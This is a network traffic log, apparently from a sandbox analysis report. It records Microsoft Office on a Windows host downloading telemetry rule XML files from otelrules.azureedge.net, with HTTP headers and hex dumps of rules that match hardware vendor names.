2024-11-05 17:45:59 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:59 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 57f8276b-001e-000b-7658-2e15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174559Z-17df447cdb5fzdpxhC1DFWdd3400000001k000000000k0b6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:59 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:00 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:00 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:00 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174600Z-16547b76f7f4k79zhC1DFWu9y000000005e000000000suu9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:00 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:00 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:00 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:00 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174600Z-16547b76f7fdf69shC1DFWcpd000000005fg000000000hus x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:00 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:00 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:00 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:00 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174600Z-16547b76f7fnm7lfhC1DFWkxt4000000059000000000vrg3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:00 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:00 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:00 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:00 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174600Z-16547b76f7f22sh5hC1DFWyb4w00000005e00000000076be x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:00 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:00 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:00 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:00 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174600Z-16547b76f7frbg6bhC1DFWr54000000005fg000000000xnu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:00 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:01 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:01 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:01 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174601Z-16547b76f7fkj7j4hC1DFW0a9g00000005cg00000000p25z x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:01 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:01 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:01 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:01 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174601Z-16547b76f7fsjlq8hC1DFWehq000000005a00000000066an x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:01 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:01 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:01 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:01 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174601Z-15869dbbcc6lxrkghC1DFWp3wc00000005ng000000005xq4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:01 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:01 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:01 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:01 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 99f7ed0d-701e-0050-604a-2f6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174601Z-15869dbbcc6lq2lzhC1DFWym6c00000000n0000000003kan x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:01 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:01 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:01 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: e92242f2-701e-005c-7858-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174601Z-17df447cdb5qt2nfhC1DFWeaa000000001h000000000dhyd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:01 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:02 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:01 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174601Z-16547b76f7f7jnp2hC1DFWfc3000000005k0000000007u0m x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:02 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C 